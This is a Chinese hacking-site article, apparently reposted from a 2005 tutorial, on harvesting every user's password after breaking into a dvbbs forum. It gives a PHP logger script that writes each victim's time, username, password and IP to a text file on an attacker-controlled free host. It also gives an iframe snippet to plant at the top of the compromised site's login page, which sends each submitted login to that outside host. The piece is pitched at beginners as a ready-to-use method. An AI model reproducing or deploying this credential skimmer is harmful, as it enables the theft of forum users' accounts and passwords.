黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

入侵dvbbs论坛后获取全部人密码另一法!(php空间)

2005-1-1 06:58| 投稿: security

摘要: 作者:saiy  来自:http://www.wrsky.com/ 记得网络上有篇文章是说利用修改登陆页面可以获取所有登陆者的密码!因为asp空间难找,而且,修改起来不是很适合菜鸟,我这提供另外一种...
作者:saiy  来自:http://www.wrsky.com/ 记得网络上有篇文章是说利用修改登陆页面可以获取所有登陆者的密码!因为asp空间难找,而且,修改起来不是很适合菜鸟,我这提供另外一种方式!*********************************************************前提,你必须有个php空间。http://www.512j.com在这里可以免费得到10MB的假设我们的空间是http://test.512j.com在目录下建立一个文件a.php代码[CODE]<? //a.php $s="ceshi.txt";//密码保存为ceshi.txt $fp=@fopen($s,"a+");//打开ceshi.txt,准备写咯。 $time = time();//获取时间 (登陆者) $ip="$REMOTE_ADDR";//获取IP(登陆者) $newfp= $time."|".$user."|".$password."|".$ip."|".chr(13).chr(10);//所有数据,时间,用户,密码,IP等等分别属于newfp @fputs($fp,$newfp);//写newfp里的所有内容,@是用来屏蔽错误的! @fclose($fp);//关闭ceshi.txt这个文件! ?> [/CODE]然后修改对方的login.asp这里不需要懂得任何语言!在对方login.asp的最上面写就可以了![CODE]<iframe frameborder=0 width='00%' height=00 scrolling=no src='站点地址/a.php?user=<%=request.form("username")%>&password=<%=request.form("password")%>'></iframe> [/CODE]这样对方登陆之后站点的使用的帐号和密码就会保存在目录下的ceshi.txt里了!呵呵,保存格式为:这是时间|帐号|密码|IP地址这是方便将来写个页面把它读出来,以免记录大到打又打不开,删又删不了了就是很麻烦了!!!呵呵,希望能给大家带来另外一种思路!!!

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

发表评论

最新评论

最新

返回顶部